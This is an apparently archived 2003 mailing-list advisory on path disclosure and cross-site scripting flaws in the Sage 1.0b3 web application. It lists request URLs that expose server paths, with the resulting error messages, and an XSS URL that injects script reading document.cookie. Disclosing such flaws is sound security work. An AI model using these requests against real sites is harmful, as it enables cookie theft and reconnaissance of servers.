XSS and Path Disclosure in Sage

• Previous message: Roy Hills: "New version of ike-scan (IPsec IKE scanner) available - v1.1"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
topic: XSS and Path Disclosure in Sage
product: Sage 1.0b3
vendor: http://sage.dev.box.sk/
risk: middle
date: 02/20/2k3
discovered by: euronymous /f0kp /r00tc0de
advisory urls: http://f0kp.iplus.ru/bz/015.en.txt
               http://f0kp.iplus.ru/bz/015.ru.txt 
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=


description
-----------

1) path disclosure

u can view full system path with two ways:

http://hostname/?mod=some_thing&op=browse

where `some_thing' is a nonexistent module name

===================================================
Fatal error: Cannot instantiate non-existent class: 
module_some_thing 
in /home/aztek/libraries/module.inc.php on line 62
===================================================


other method is:

http://hostname/?mod=node&nid=some_thing&op=view

===================================================
Access Denied 
/home/aztek/modules/node.module.php:71
===================================================


2) cross-site scripting

becouse $mod is not checks correctly, u can to insert
html, javascript, etc in script output:

http://hostname/?mod=>alert(document.cookie)</script>&op=browse


shouts: r00tc0de.net, DWC, DHG, security.nnov.ru, all 
russian security guyz!! and kate for being a kewl girl ))
fsck_off: slavomira and other dirty ppl in *.kz

================
im not a lame,
not yet a hacker
================

• Next message: EnGarde Secure Linux: "[ESA-20030220-004] MySQL double free vulnerability"
• Previous message: Roy Hills: "New version of ike-scan (IPsec IKE scanner) available - v1.1"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Feb 20 2003 - 08:02:47 PST